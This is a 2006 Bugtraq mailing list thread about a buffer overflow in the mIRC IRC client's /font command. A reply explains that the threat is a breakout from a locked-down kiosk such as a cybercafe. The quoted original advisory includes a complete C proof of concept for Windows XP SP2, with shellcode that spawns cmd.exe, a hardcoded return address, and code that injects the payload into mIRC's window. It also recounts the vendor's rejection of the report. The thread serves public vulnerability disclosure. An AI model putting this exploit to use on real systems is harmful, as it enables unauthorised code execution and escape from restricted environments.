Re: Buffer Overflow /Font on mIRC
As quite some confusion has arisen as to how exactly this and the previous
finding [1] are security vulnerabilities, allow me to explain the issue in a
little more detail. The main point is that these are attacks of local users
against a locked-down (kiosk) system where the users can only run mIRC and
no other programs.
In order for these vulnerabilities to have any significance, the following
requirements would have to be met for an attacker on a system, at a minimum:
* The attacker is able to run mIRC, or it has been started for him already;
* The built-in /run, /dll and /com commands are password-locked in the mIRC
options;
* The mIRC directory, and mIRC's root (current) directory, are read-only;
* The attacker is _not_ able to start arbitrary programs on his user
account.
The result of using this exploit is then:
* The attacker is able to start arbitrary programs on his user account.
I.e. if you restrict a local user's abilities, and then set up and consider
mIRC to be a sandboxed environment for him, the local user can break out of
that sandboxed environment using this exploit. As indicated by the poster in
his first mail, environments at risk from this would typically be
cybercafes, where clients are only able to run (e.g.) a locked-down browser
and mIRC, and nothing else. The 'victim' of the exploitation would then be
the owner of the cybercafe.
Although the reported bugs can indeed be called security vulnerabilities in
such environments, it's somewhat of a stretch, given that mIRC doesn't
actually claim to be a complete sandbox, and already allows the user to e.g.
create/overwrite any writable file and make arbitrary socket connections
anyway. And fortunately, only a relatively small number of people are
affected by this vulnerability at all - certainly not any end-user. Either
way, these are bugs, and should of course be fixed.
Note that as the targeted environment obviously doesn't allow the user to
run a compiled exploit, actual exploitation would require that the shellcode
be constructed in mIRC's scripting language. It's rather easy to do that,
though.
Kind regards,
David van Moolenbroek
[1] http://www.securityfocus.com/archive/1/420000
----- Original Message -----
From: "Krpata, Tyler" <tkrpata@xxxxxxx>
To: "Crowdat Kurobudetsu" <crowdat@xxxxxxxxx>; <bugtraq@xxxxxxxxxxxxxxxxx>
Sent: Friday, January 27, 2006 12:36 AM
Subject: RE: Buffer Overflow /Font on mIRC
I'm not following your English...are you saying you believe that this IS
or is NOT an exploitable bug?
-----Original Message-----
From: Crowdat Kurobudetsu [mailto:crowdat@xxxxxxxxx]
Sent: Tuesday, January 24, 2006 6:24 AM
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Buffer Overflow /Font on mIRC
- 1 - Introduction
Written by Khaled Mardam-Bey, mIRC is a friendly IRC client that is well
equipped with options and tools.
- 2 - Vulnerability description
This bug was discovered by a friend (Racy) , with the command exposed by
Racy only hung mIRC, but after debugging and
testing, I discover that allow code execution.
Racy use this command /font -z $readini(c:\a\a.ini,aaaaaaa ,aaaa)
$readini(c:\a\a.ini,aaaaaaa ,aaaa) , in both cases return
null and crash, if the first parameter it's null and the second a long
string can overwrite the EIP and execute code, with
user privileges, DON'T ELEVATE PRIVILEGES.
- 3 - How to exploit it
This PoC open a cmd.exe,also it's possible execute any other code.
----------- CUT HERE ----------------------
/*
mircfontexploitXPSP2.c
This PoC it's for XP SP2 English
Special thanks to Racy from irc-hispano
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
int main () {
HWND lHandle;
char command[512]= "/font -z $null";
char strClass[30];
char buffer[128]=
"\x20\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char shellcode[999]=
"\x55"
"\x8B\xEC"
"\x33\xFF"
"\x57"
"\x83\xEC\x04"
"\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x6D"
"\xC6\x45\xFA\x64"
"\xC6\x45\xFB\x2E"
"\xC6\x45\xFC\x65"
"\xC6\x45\xFD\x78"
"\xC6\x45\xFE\x65"
"\x8D\x45\xF8"
"\x50"
"\xBB\xc7\x93\xc2\x77"
"\xFF\xD3";
//Shellcode system("cmd.exe"), system in \xc7\x93\xc2\x77 0x77c293c7
(WinXP Sp2 English)
char saltaoffset[]="\xD6\xD1\xE5\x77"; // jmp esp 0x77E5D1D6
(advapi32.dll)
SetForegroundWindow(lHandle);
lHandle = FindWindowEx(FindWindowEx(FindWindowEx(FindWindow("mIRC",
NULL), 0, "MDIClient", 0),0, "mIRC_Status", 0), 0, "Edit
", 0);
if (!lHandle) { printf("Can't find mIRC\n"); return 0; }
strcat(buffer,saltaoffset);
strcat(buffer,shellcode);
strcat(command,buffer);
printf("mIRC Font Command Exploit: %s\n", command);
SendMessage(lHandle, WM_SETTEXT,0,(LPARAM)command); SendMessage
(lHandle, WM_IME_KEYDOWN, VK_RETURN, 0); }
----------- CUT HERE ----------------------
- 4 - Solution
Khaled contacted with me about the latest advisory, he says don't have
any bug, any vulnerability.
This is the solution of Khaled:
"as far as I can tell, this is neither an exploit nor a vulnerability.
The above report describes a local bug in mIRC. The
author of the report indicates that any malicious software on your
computer can modify your mIRC settings to cause mIRC to
crash. But if you have malicious software on your computer, you've
already compromised your security..."
I post a response in the messageboard in mIRC forum, telling that a
exploit isn't a malicious software alone, isn't a trojan
or virus, and if a application it's secure, it's impossibly to execute
any code, the user don't compromise the machine if
download a exploit, the machine it's compromised if the program it's
vulnerable to the exploit, but Khaled delete it and
close the thread.
More info:
http://trout.snt.utwente.nl/ubbthreads/showflat.php?Cat=0&Number=146129&
an=0&page=0#146129
- 5 - Credits
URL Vendor: www.mirc.com
Author: Jordi Corrales ( crowdat[at]gmail.com )
Date: 24/01/2006
Racy post on messageboard:
http://trout.snt.utwente.nl/ubbthreads/showflat.php?Cat=0&Board=bugrepor
ts&Number=118751
Spanish Advisory and Compiled Spanish Exploit:
http://cyruxnet.org/archivo.php?20060121.00